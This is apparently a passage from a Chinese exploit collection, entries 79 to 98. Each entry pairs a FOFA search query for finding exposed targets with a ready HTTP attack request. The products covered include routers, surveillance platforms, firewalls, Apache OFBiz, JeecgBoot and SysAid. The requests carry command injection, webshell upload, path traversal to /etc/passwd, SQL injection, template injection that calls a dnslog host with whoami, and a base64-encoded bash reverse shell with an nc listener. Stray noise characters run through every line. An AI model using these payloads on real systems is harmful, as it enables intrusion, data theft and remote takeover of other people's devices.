9 e/ d# ` @7 z* P* u8 p' |% C8 |- J! E
79. BYTEVALUE 百为流控路由器远程命令执行
) O5 P2 ]3 E! f0 |! A' [FOFA:BYTEVALUE 智能流控路由器
- ~$ d( D5 p! j2 Z7 cGET /goform/webRead/open/?path=|id HTTP/1.1
6 ]2 T4 j8 e$ u9 D% T- Q# g, rHost:IP
, x" k3 F$ Q6 z5 _" ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
9 s. _; Y/ R+ z1 P& w: @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ m0 j# R$ C3 g: l+ LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- ~& l# |0 e/ v8 X$ B& NAccept-Encoding: gzip, deflate
) P: Z# o+ e9 A. Y0 HConnection: close7 l8 k/ `7 R/ _+ [5 J' C% h0 `0 @ L" Y
Upgrade-Insecure-Requests: 1
: N1 l- h# W" U3 s' f+ g) n7 m. [# N! N* i7 h. N
0 l! T0 J0 W* W( c$ R
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传" ~% {3 G+ n( r% H
FOFA:app="速达软件-公司产品"( C$ @* y; c# s
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
|8 S: n; ?) y; aHost: x.x.x.x
8 K6 u- j {0 w3 g) _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, e2 e0 k7 F, T( `
Content-Length: 27
k3 _- y0 `4 j* ?: ?& E, F7 ]9 fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& R* [* \% b- {Accept-Encoding: gzip, deflate
* m k1 N; v% G( E# |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 [: v# N$ b& n# _/ CConnection: close
) H4 L$ x; Q# K: N) l6 h2 m2 NContent-Type: application/octet-stream
. D8 ]7 E" q; Q L; yUpgrade-Insecure-Requests: 1, d) O2 N6 W' v2 |7 [0 e
G; { W. _. Y z/ z1 ]* n<% out.print("oessqeonylzaf");%>
0 S J0 D, i, j, l( w( ]9 _
2 y/ n, ]- d- x. g' t: K. x, S" V& c" l& w1 m( W \
GET /xykqmfxpoas.jsp HTTP/1.1' ~9 m* p' J- C. c' ]! d+ R
Host: x.x.x.x6 w: S. U3 E Q" A D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# P2 |1 M9 N8 F; }2 J7 P/ X5 X( [1 k- FConnection: close( k" ?" Y# I$ H9 z9 D" @
Accept-Encoding: gzip
1 R# w: D6 U6 W/ }5 {0 t: L" z4 o2 R: d
/ S n( H* K' H9 O$ y81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露8 n$ K: g5 |. b! O
FOFA:app="uniview-视频监控"! |% l z0 ^# D: }- [6 ]
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
2 J$ P6 P0 {; P# x! U( UHost: x.x.x.x$ o* o. y4 Q; \, N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 e- |+ q) f1 uConnection: close
( }/ D; D% V" I$ @' @5 Z" M+ W! bAccept-Encoding: gzip
9 A( |$ Y0 ?& a( y8 v. @: Q# {
9 X/ v/ {: ~+ z1 a5 R2 [" q: Q; \
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
2 r2 T1 B$ J8 G% ?# Z# Z3 B# W8 PFOFA:app="思福迪-LOGBASE"1 Q D9 f; u% ~5 d7 x8 L# O
POST /bhost/test_qrcode_b HTTP/1.1; v4 X& [% Q3 S% Y7 y2 y7 X3 z
Host: BaseURL
, G1 b" I$ p# JUser-Agent: Go-http-client/1.1
- f2 ^0 m3 ?: V' \9 JContent-Length: 23
7 m! m3 m- f; m( M ?# n3 ^, _Accept-Encoding: gzip
5 v4 r3 V; T* b* }% W! j! cConnection: close
, j- G( ~" m8 V' }/ h' y+ LContent-Type: application/x-www-form-urlencoded# j6 N, |+ \* e8 Y$ c
Referer: BaseURL: G% C8 w' T2 W/ {+ F) A) ^
! `' s; x4 g S. t9 H
z1=1&z2="|id;"&z3=bhost
) l6 K5 k4 M0 R# N+ \- i i' R( Q& n9 P9 H& |% P* S/ u* g7 J
, e* q6 E% N* h' v5 g3 G
83. JeecgBoot testConnection 远程命令执行
1 a* K# e* ^, I0 Z% {1 ?FOFA:title=="JeecgBoot 企业级低代码平台"0 Q- p0 f" z% [; T' X/ V
8 w' w7 @( Q4 H8 w5 [
0 ?) w8 s4 Z$ p! L. G! dPOST /jmreport/testConnection HTTP/1.18 N; ^% y" u2 A0 K! j
Host: x.x.x.x
* W" N! p2 g- }. [: _, ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) r9 p0 c' b2 d9 Q
Connection: close; v( h/ I) a, Z) d, `
Content-Length: 8881
7 [8 T- A& T/ L* m8 w8 {+ i+ S zAccept-Encoding: gzip3 _* z( g& I. Z2 X& `- s3 ^$ s
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
, B5 P7 ?1 R/ w# o, uContent-Type: application/json
0 ~3 d. l1 ?1 ?5 {2 V4 E4 M4 V" [6 B! o% R, F5 e9 s
PAYLOAD
9 \9 q' G6 w" A; q! S
$ ~& O, _" A/ Y' h84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
" b; r+ b; x; F0 IFOFA:title=="JeecgBoot 企业级低代码平台"1 G- L6 u; w! u( ]4 E
8 u! O4 x2 ~7 h5 ?
. J+ J! }4 L$ h4 k) S) }0 @: ]
$ I9 J2 N; L# [; ~* @/ z) ?" A
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1- J% _( x4 B( W& E, i
Host: 192.168.40.130:8080
/ W: d0 P) i! | k8 B8 T* p1 CUser-Agent: curl/7.88.13 L: i; E8 O$ ^7 H F( G/ A' C* Y
Content-Length: 1564 m4 ]7 f$ p L% U8 e7 V
Accept: */*
* O4 |( _, c6 U% }( A4 |3 |# uConnection: close
$ M) m2 T- v( `( ]4 f7 e/ LContent-Type: application/json' p2 ^$ I( }. g( |+ ^* j" ^( ~2 c t: ^
Accept-Encoding: gzip; @" b" N3 `# n' ~4 Z3 v
3 X0 \0 X7 T# U8 }! p4 {; s# ?{
2 i$ n5 \" _9 T# ]8 } "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
: ~. `% o1 t9 s ] G& S# O "type": "0"
9 ]$ k7 n' O/ W( l! U, X}0 k! \3 |6 A J7 `8 f
! f/ y4 N4 f. b
( M4 N, j; m2 I7 o A$ D1 m85. SysAid On-premise< 23.3.36远程代码执行6 A/ W7 y. S. \3 ^
CVE-2023-472469 }4 u7 o( ]3 b# Q
FOFA:body="sysaid-logo-dark-green.png"
2 d( V9 Y" w2 i$ z( [EXP数据包如下,注入哥斯拉马3 G5 ]$ I8 e3 V. _) {
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
9 _1 l/ @0 r$ C. T! O0 h* B" sHost: x.x.x.x
% ]1 ]+ r: \" U" V( A! F* [& j! ~$ PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# i+ J" N1 W+ n7 s
Content-Type: application/octet-stream
# x+ k5 {& c$ P. ?. pAccept-Encoding: gzip
# v! ]1 u: C7 l( o$ Z$ V t! E# _" l
PAYLOAD
2 K. H! t9 b* `' J/ Q7 U" q
9 g* W3 L3 [. I* i8 _回显URL:http://x.x.x.x/userfiles/index.jsp3 f2 _, x# n3 x; a4 r
) O* z" C- o+ R; u$ o86. 日本tosei自助洗衣机RCE
: K( B& g" z# N; n. A) a1 qFOFA:body="tosei_login_check.php"
; o& N0 j# c- k/ H& `( f0 X2 DPOST /cgi-bin/network_test.php HTTP/1.13 b$ g# x6 z }
Host: x.x.x.x5 o: \- |, t' q
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36$ Z4 q, I$ p0 w$ G& b0 G7 b7 V
Connection: close
2 ?' d# @6 N( K. v$ m3 L2 OContent-Length: 44
$ d4 D/ M0 L! r9 d% R0 p) X( B' pAccept: */*1 X, L h2 }$ F7 _
Accept-Encoding: gzip
1 t4 ^8 s! [" G( V8 G- `Accept-Language: en
! ^0 x. r; e8 sContent-Type: application/x-www-form-urlencoded7 j7 d% b( I2 A4 R) @
0 Y- g( q2 g- h% {1 A2 Ghost=%0acat${IFS}/etc/passwd%0a&command=ping1 ~$ z- P1 c! b
2 i7 N* z# i' V# u0 z9 _
" I0 K0 e1 w; E* U7 A87. 安恒明御安全网关aaa_local_web_preview文件上传( h" v. G8 }- g R' L
FOFA:title="明御安全网关"
' {2 ?8 g' s$ P0 Z% i& T# F: bPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
0 i& N9 E1 ]' e5 O9 c* SHost: X.X.X.X, ^/ I! s8 a5 Z- W' G5 r' f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- Z) k4 m; r. I Y- KConnection: close
5 P& C) {- E% P MContent-Length: 1983 A7 ?3 q; n0 V6 t. x( h! S) f. S4 G9 J7 g
Accept-Encoding: gzip! B# m2 a( u* h& L/ p7 H
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
2 H# e; B7 H9 L4 L+ W: t7 H
6 p& E0 T) k+ f2 o; ^--qqobiandqgawlxodfiisporjwravxtvd* T5 e4 @8 A0 C! `( T$ e3 o6 |
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
- v; l8 W) D1 X( HContent-Type: text/plain, S0 b/ k' K1 D' Z' h: W; u
+ O( [. j7 z9 _5 A0 l( @: k
2ZqGNnsjzzU2GBBPyd8AIA7QlDq2 h4 ] I) C7 n6 B7 B
--qqobiandqgawlxodfiisporjwravxtvd--' L1 @* L1 g- O4 \& d. a, ~
- X8 z9 y( l4 z' U9 @9 I0 j5 `
$ U4 I& T% ^. a3 C
/jfhatuwe.php; \; ]& \ A& c
% {' c4 B* R7 B5 E/ K
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
" b- [: n- J: t# T$ |5 `) hFOFA:title="明御安全网关"% E3 a' E1 S& I+ j+ R" }
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
4 h1 _9 W3 w$ D" D* hHost: x.x.x.xx.x.x.x& b' C8 k7 n+ z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 R7 d G _+ k# ~* A3 b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 P; F! w1 `. i+ p3 k! h
Accept-Encoding: gzip, deflate
' n! h0 k* ]+ h; [6 U0 A! ~% z0 oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) h; i+ I; S% `+ ~Connection: close6 ]' |5 }( s6 ~# w7 b
, ]; C* b% f( c6 F; \& k! n- D7 c# m: n. e: d ]3 y6 L8 M* ^
/astdfkhl.php' E0 y9 }7 t( C; S. R
. e9 X" G' I6 H89. 致远互联FE协作办公平台editflow_manager存在sql注入6 z4 D& `1 y5 p9 E; W: m" ~
FOFA:title="FE协作办公平台" || body="li_plugins_download"( C8 |9 ?0 ^# l. q% U& c6 }
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
( b# z |+ S2 R1 w: X; U" J2 jHost: x.x.x.x
8 ^" ]$ J7 R. v: A8 mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 O$ i9 v) B5 TConnection: close
1 {+ V6 |+ Y) y9 VContent-Length: 41* X8 k. {5 }" j: r+ |& w
Content-Type: application/x-www-form-urlencoded
1 x4 ^' Q# v# k6 M; Z) `4 lAccept-Encoding: gzip, C1 O: o9 z1 _3 W% E1 q+ I
; v% q* S+ l6 X" ]+ ~3 C4 f5 a
option=2&GUID=-1'+union+select+111*222--+
0 A- ~: q/ a9 w' G0 v- H' F4 J+ q! z$ ]0 G$ z9 h1 T( b
& F2 ~/ M/ C: m- `
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
! u8 x0 K$ c' |* o2 lFOFA:icon_hash="-1830859634"
% ` g9 k S; A9 s/ zPOST /php/ping.php HTTP/1.17 p& x: F) O$ X8 h5 `
Host: x.x.x.x% c) [* ~0 j5 ^1 X& @4 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0( c! c3 A8 C% ], W' D" ~
Content-Length: 51
& x$ w2 L7 v/ x2 `" \Accept: application/json, text/javascript, */*; q=0.01- G; m: o' x+ q0 C
Accept-Encoding: gzip, deflate
% p r( Y' P. \8 S G8 v: gAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* c5 [ J& `; U5 [& {
Connection: close
) u& X+ W6 Q! F3 B& e. I6 c% AContent-Type: application/x-www-form-urlencoded
7 w5 E) H+ P. J/ m1 m L& QX-Requested-With: XMLHttpRequest
6 a; a- d! O/ I% ~- I% t3 {# p+ B' M1 C: }
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
H: V- D) v' |) k v% R7 h- ?$ h0 O: S$ j9 j- l6 P% K$ Y
$ |3 a% H: ~) J8 M8 C9 t( i
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
0 ?2 t% s `" l% f% M3 eFOFA:title="综合安防管理平台" f: a. ?, A( I# f. ~9 \7 e2 \
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.10 e2 a5 C/ [1 e9 `* S
Host: your-ip }# K# h# u) G5 b; j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
. e1 Y# K1 U9 r) h1 E7 xAccept-Encoding: gzip, deflate& L3 M) c; N1 s) q# j6 J8 Y, s i
Accept: */*% A$ P6 v. ?( y' h* K
Connection: keep-alive* r' P# m9 o, w& F+ Z, G$ H0 C. h
2 o, |, S8 @' B7 k3 h3 G/ v
0 Y0 @: B f& N J1 `# j: v1 K0 z
2 t" k: X, {' H
92. 海康威视运行管理中心session命令执行9 a9 A+ c j3 j/ N( e& t" v2 q1 {
Fastjson命令执行) k7 Q# r r t* j' Z; s6 [
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"2 ^" ?5 B4 c% a
POST /center/api/session HTTP/1.17 o2 F; y8 f& \4 z: e4 A% p
Host:
( x9 P% h7 e2 {5 J6 w! e/ Q* {Accept: application/json, text/plain, */*+ C/ V! d2 ^6 m- F0 \
Accept-Encoding: gzip, deflate8 P/ {2 {# Q; f& b% o& N/ W
X-Requested-With: XMLHttpRequest& `: T7 [9 T& R8 l/ O2 L. n# ?
Content-Type: application/json;charset=UTF-80 _" e4 k3 { w2 J# j2 q+ g
X-Language-Type: zh_CN
. l/ |1 R% H) k% `3 a' W; DTestcmd: echo test
# |8 y8 e; i; j9 k1 P# s) aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
$ k6 o- F) _& D v/ I; YAccept-Language: zh-CN,zh;q=0.91 n% p8 E0 ^; z; d" A
Content-Length: 5778: d( H/ M3 G0 s; l6 V0 n; {, j
; n- d( F, {( Y1 }PAYLOAD; T& W0 z3 S' q( _, O d) D9 J0 \1 f
. e! R6 J2 w' z* C' Y4 e$ w& D. Q, F6 Q; g# D% ?
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传) V1 Y; a7 e" r) R
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
" T0 z$ Q" v7 R4 n+ ZPOST /?g=app_av_import_save HTTP/1.11 N' o5 q, p9 m; M. P
Host: x.x.x.x
. p* F4 U& Y3 y$ oContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx# i. m9 \& ^2 s0 D7 y- T3 p( B% e- y
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
# R" J2 d2 H1 `4 V0 M T
' D/ o/ V. A9 ]9 X- Q9 n9 d! u& q8 ]------WebKitFormBoundarykcbkgdfx
& ?) Y! O. V2 h& `9 O) p4 I h+ U( CContent-Disposition: form-data; name="MAX_FILE_SIZE"; k4 e8 Y! u0 @5 [* y0 k( B
8 B3 F; z' K" r; L; t/ \! Z t
10000000
* m( b- u" P. U: a------WebKitFormBoundarykcbkgdfx: W, `, R: O+ Q; A) _
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt". O8 x( }0 b9 }5 q
Content-Type: text/plain
9 L+ `5 @' @9 x! Y5 T
/ Y8 V, J/ l: [: w1 Q3 n) [5 Z5 M9 Wwagletqrkwrddkthtulxsqrphulnknxa+ o) v7 Z+ _/ v4 Z. \9 h0 Y" ^
------WebKitFormBoundarykcbkgdfx+ U& a* T3 F/ Q5 R( W
Content-Disposition: form-data; name="submit_post"1 n& O2 X& y1 @' j/ g6 v7 D
4 N' I/ H) `5 `+ j: {, cobj_app_upfile" P' L8 P: p% d) C) O. b) S
------WebKitFormBoundarykcbkgdfx
; ^2 R) _& Y" {9 AContent-Disposition: form-data; name="__hash__"
% Y( x" ~: N ]5 T
) T0 s- ]5 r T3 E$ _7 D0b9d6b1ab7479ab69d9f71b05e0e94458 T/ m3 h0 k4 V, b$ X% f, E
------WebKitFormBoundarykcbkgdfx--4 ~$ |* p0 ?2 @& B7 ]2 P
( e/ m& T# t6 t' ]2 m. [( L2 [4 w. Q* \2 G! |5 d. l/ K/ Z, l
GET /attachements/xlskxknxa.txt HTTP/1.13 U7 e! ^9 n/ t. G7 E9 ^9 g
Host: xx.xx.xx.xx/ R3 y0 n. _+ v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36# H# W6 A) p3 Q) c# x. e+ V4 E q5 g
9 h- a# G9 S$ y" E: _' t- V+ w: T* ~. e1 Z$ z
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
) E9 J8 D# l w% `9 @FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
! n" O4 ]9 B% h2 JPOST /?g=obj_area_import_save HTTP/1.1) G5 [6 }' r. A) o; k
Host: x.x.x.x
; g% v: z+ i* M% v" AContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
$ a9 B' u' @: xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
; e& l/ i8 T7 U) d
7 E. M: m" @7 o1 ]- F9 C$ E------WebKitFormBoundarybqvzqvmt
: e3 F+ r+ v5 n$ U% j; }. LContent-Disposition: form-data; name="MAX_FILE_SIZE"6 a/ c; |) S. [
# I" h$ }9 J# S H
10000000
, |% p5 l" Z# B, e! A8 K------WebKitFormBoundarybqvzqvmt
9 k+ L5 D2 ^ ?; U0 T1 x: TContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
7 B# F0 F+ b+ v" m, F4 MContent-Type: text/plain8 W8 u5 H+ |8 }8 q- A6 I. I2 s
* L: ~0 ^1 @* \& I# W( p9 Q2 Y
pxplitttsrjnyoafavcajwkvhxindhmu
3 E5 Q h1 l, b7 n------WebKitFormBoundarybqvzqvmt
% Y! x( o1 I4 Z7 C% w& I, y: s. d* }Content-Disposition: form-data; name="submit_post"5 M5 s' B/ k P
7 k0 h# Q& | B) S. |: M& [
obj_app_upfile5 z0 N4 ~9 R+ S! G
------WebKitFormBoundarybqvzqvmt
4 n5 `% c, W5 b3 x0 Y$ j7 S" gContent-Disposition: form-data; name="__hash__"3 [: T/ p6 B! v; h
, f" B6 ?2 e3 c
0b9d6b1ab7479ab69d9f71b05e0e9445
& c9 r' w9 r) b% J b) K# H% V------WebKitFormBoundarybqvzqvmt--% A5 |# |2 n+ o: L7 j, z! Q
" v' y* |) c, v/ F. o$ J- A, h# q3 j
) S- ]5 h) D. l/ f
GET /attachements/xlskxknxa.txt HTTP/1.1! d" F( i/ I d. T
Host: xx.xx.xx.xx
2 K/ J9 a2 ^( }7 ?/ RUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.364 \- K. t. B: T, j
) d% p9 C4 } p3 \/ x
$ T( \+ i; I' k/ r: R
8 B4 H9 B, p3 n8 b; E2 N! L8 e95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行% q$ g( I4 B, q* l
CVE-2023-49070
- N8 D f5 e6 T9 C: l& d0 ?FOFA:app="Apache_OFBiz"
+ e% l9 q4 D* a% O( q+ g6 sPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1: _: d: N) t. h% h5 c
Host: x.x.x.x
3 Y/ c" p0 { Q, kUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
s- B! `4 h3 i; ^/ nConnection: close# A; e3 v, C6 b
Content-Length: 889
2 ?3 b6 \. I& ^/ f" F; vContent-Type: application/xml/ x2 Y0 W1 o7 r
Accept-Encoding: gzip
' A- I' I. H) ~# b: V3 C! n
I& ]: Y* U! \4 R) z6 `<?xml version="1.0"?>
+ ~; L! T+ d& t8 }<methodCall>
; @0 h9 [& ?/ [ <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>8 B/ a. o5 G8 E8 s; g6 A
<params>$ r7 Q4 O' a8 u" \" O" E
<param>; t: H" a! @4 j, r
<value>
6 ~: x) m/ ^$ N: Q. B' j <struct>9 U5 q9 I* p' T, b& T& W4 Q. T
<member>* L5 G4 P4 k* Z/ f4 e
<name>test</name>- T/ g+ u8 Y' e1 i
<value>! y! n4 H" v1 j$ @, w. q
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
- @1 U7 ^ o3 X& x </value>
8 ^9 N" y& r: i- | </member>$ h: u! M8 Z x; T8 m
</struct>( ?# e( Q$ E# t9 E
</value>+ M, ^$ Z$ E( X f& s' b& }
</param>( w2 @& l3 c2 S' w t6 E [
</params>
; X$ p. h. \+ \; _2 B* J/ s0 b</methodCall>
- u& S. @0 y7 Y- U0 c* q# V! ]; b6 h4 t% @
' j& z& \5 i0 h' F用ysoserial生成payload% u/ V6 G3 H- J0 I
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
R2 t/ L8 X3 e; W) G, k( K
! n, i# a) z3 w' Q2 i
% w8 o2 q$ ~/ _. p7 C& E, l将生成的payload替换到上面的POC
# V( r2 S7 X, \2 `POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
1 _, p3 ~1 c9 g: ^Host: 192.168.40.130:8443
) G+ I+ `; [) j* ~User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
4 C$ ~& h# Q3 c1 @Connection: close
r7 \+ l! @9 H6 n2 ~; ?; p* FContent-Length: 889
: `4 z. e1 s& lContent-Type: application/xml4 v3 Q! U' Y9 Q
Accept-Encoding: gzip
( m% W) u- a) R2 Y) ]' N6 ~2 P2 R) p. j
PAYLOAD
# p i5 {# m8 M) v: Z4 x8 V' l
1 b. p! R5 T7 X- w+ X96. Apache OFBiz 18.12.11 groovy 远程代码执行2 Y8 E) x! v+ X, ~( |
FOFA:app="Apache_OFBiz"' q! e, x$ `1 v0 Z E
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1& t8 o) g, a" N& {
Host: localhost:8443
+ g8 P! S8 T( P8 K2 YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
2 f7 ?& }( Q0 V6 {% J. b* \6 XAccept: */*
/ I7 o- e1 [% n5 @ n. G. CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 {+ t, Z1 d2 D2 I; x, X
Content-Type: application/x-www-form-urlencoded, t1 ^* E1 S4 }- `
Content-Length: 55
" L1 ?! d0 M2 I' X, y, I
7 L2 Y' i0 C8 K7 \* B5 `groovyProgram=throw+new+Exception('id'.execute().text);
6 `9 p9 J8 m( r% A/ s
! J+ S8 I* j# r8 f
$ |* X& i" Q: Y! [$ ^9 W0 T3 S7 ^反弹shell
' K5 w: g5 ]: Y6 L在kali上启动一个监听
+ b* J1 B+ b( m, f# g: |nc -lvp 77770 `7 U4 }' T( B. y3 Y. ]$ m" C2 ~" N
, J4 K5 a& b+ h3 l( Z; R1 i* _
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1 P- }7 ~0 D" y
Host: 192.168.40.130:8443
! q0 D3 q4 x, m4 C) f( dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
2 V1 |9 O- S% X7 C# B" j8 wAccept: */*
7 Y$ [0 i; y' U# R+ v5 y: `) V, nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 r L2 v$ x1 h9 s' b
Content-Type: application/x-www-form-urlencoded/ M& B Z+ q+ @0 } X3 f7 a
Content-Length: 714 Y" p6 D7 W2 q
4 c* t& @2 z' s# l* j* agroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();: s& n6 X' X( [! @, e8 \" e' y
. y7 K( A! o; W: K X0 l' M# V( T97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行! N. N$ P7 h$ t4 P
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"2 G( W% U9 t0 F5 W) ^9 c
GET /passport/login/ HTTP/1.1- H8 u: e# U' x6 q2 S' H1 p
Host: 192.168.40.130:80851 }! _- W; G# x( L) X, L9 E4 N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) U* G7 J' [0 g' F
Accept-Encoding: gzip* b1 `0 ?, F% [# I
Connection: close* X `8 Y7 K" ^1 d2 u
Cookie: rememberMe=PAYLOAD
/ x5 }' @5 i- q H7 u' QX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"' j' z: k* U, T- S/ Q' ?2 l
3 ]/ r9 f- R& E+ v8 V, g9 O
- f( F0 P& {# s$ W1 E! Q98. SpiderFlow爬虫平台远程命令执行# l- @# _+ o9 o z. m5 h
CVE-2024-01951 M/ ?3 X- ?& _9 \: {
FOFA:app="SpiderFlow"# C3 F O- n3 P9 m- a8 P
POST /function/save HTTP/1.1
5 o& D0 T6 O$ v$ A% u+ d, kHost: 192.168.40.130:8088
; D: f6 Z4 m, K# ?# Z, S0 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0& D4 r6 B: }, Y1 g
Connection: close( N6 P. b! F! K7 N0 E8 n; G6 o
Content-Length: 1210 Z |# x7 d1 m0 r0 O
Accept: */*
" z' g: Y7 {+ S5 v; h( ~Accept-Encoding: gzip, deflate
! n$ P% }* p& s/ v+ O5 w# @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. X8 V& h: o$ p4 O3 F2 C8 J
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
" e& w; I) ` Z& ~% G! C9 d dX-Requested-With: XMLHttpRequest
. I/ z$ y! e" v# j" h M0 u% J( O6 g! I' u Z+ D
